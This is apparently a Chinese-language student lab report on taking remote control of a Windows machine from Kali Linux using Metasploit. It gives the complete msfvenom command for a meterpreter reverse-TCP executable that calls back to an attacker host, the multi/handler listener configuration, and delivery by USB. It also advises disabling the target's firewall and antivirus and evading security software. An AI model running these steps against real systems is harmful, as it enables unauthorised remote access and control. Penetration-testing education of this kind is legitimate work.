一、实验目的
本次实验基于 Metasploit 框架,实现 Kali Linux 对 Windows 主机的反向 TCP 远程控制,掌握 payload 生成、监听配置及安全防护规避的核心操作,理解反向连接的渗透原理。
二、实验环境
攻击机:Kali(以下使用example代替kali的ip)
靶机:Windows 10/11 (需关闭防火墙、杀毒软件等防护)
工具:Metasploit Framework、U盘(用于传输 payload)
三、实验步骤
(一)生成反向TCP Payload
在 Kali 终端中执行以下命令,生成 Windows 可执行的 payload 文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[example] lport=5000 -f exe -o /root/payload.exe
参数说明:
-p :指定 payload 类型为 windows/meterpreter/reverse_tcp(反向 TCP 连接)
lhost :攻击机(Kali)的局域网 IP,需替换为实际地址
lport :监听端口(自定义,本次使用 5000)
f exe :生成 exe 格式可执行文件
o :指定输出路径及文件名
(二)传输 payload 到靶机
将生成的 payload.exe 通过 U 盘复制到 Windows 靶机,注意传输过程中避免被安全软件拦截。
(四)Kali 端配置监听
1. 启动 Metasploit 控制台:
msfconsole
2. 加载监听模块并配置参数:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [example]
set LPORT 5000
exploit
3. 运行 payload 建立会话,监听启动成功标志如下:
终端出现 meterpreter > 提示符,代表远程控制会话建立成功。
六、实验总结
本次实验成功实现反向 TCP 远程控制,核心在于 payload 参数匹配 和 安全防护规避。反向连接的优势在于穿透靶机防火墙(由靶机主动发起连接),这也是渗透测试中常用的方式。同时需注意,实验仅用于合法授权的学习测试,未经授权的远程控制属于违法行为。